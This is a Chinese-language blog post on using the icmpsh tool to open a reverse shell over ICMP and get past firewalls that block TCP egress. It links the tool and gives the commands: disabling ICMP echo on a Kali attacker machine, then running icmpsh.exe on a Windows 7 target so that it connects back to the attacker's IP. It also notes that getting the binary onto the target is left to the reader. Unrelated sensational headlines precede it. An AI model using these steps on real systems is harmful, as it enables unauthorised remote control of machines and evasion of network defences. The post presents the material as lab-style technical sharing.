终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

利用icmp协议反弹shell

黑白之道 2021-04-25

介绍


有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。


当你已经拥有一台机器内部网络或者DMZ的一部分。他并非通过TCP来获得reverse shell的,所以不考虑绑定shell。


然而有关UDP,通常是一个DNS隧道或通过ICMP的渠道来获得一个reverse shell。而ICMP就是这个工具的重点。icmpsh是一个简单的 reverse ICMP shell,它分别用Cicmpsh-m.c)、Perl(icmpsh-m.pl)、Python(icmpsh_m.py)使win32.slave兼容原始POSIX。


它比其他类似的开源工具的主要优点是,它并不需要管理员权限就能运行到目标机器上。该工具简洁,方便和便于携带(跨平台)。


此脚本主要是针对windows的,他是一个C/S架构:slave(客户端)它是用C写的只能在windows上运行,master(服务器)是跨平台的,作者将C和Perl已经移植到Python上了。


利用

下载:

https://github.com/inquisb/icmpsh

靶机:win7

攻击机:kali


先用这个命令关闭kali的icmp回显


sysctl -w net.ipv4.icmp_echo_ignore_all=1



运行icmp_m.py文件前面是kaliIP  后面是被攻击win7的ip



将icmp.exe上传到靶机
在实际渗透当中怎么上传icmp.exe看自己的思路
打开cmd命令,输入
icmpsh.exe -t 192.168.115.6 -d 500 -b 30 -s 128

kali成功接收到通过icmp反弹的shell


注:本文只是技术分享,请勿用作非法用途。如若造成法律后果,与本文作者无关!!!


推荐文章++++

*zabbix反弹shell并拿下系统root权限

*内网kali 通过ngrok穿透反弹shell

*利用telnet反弹shell的两种方法


    文章有问题?点此查看未经处理的缓存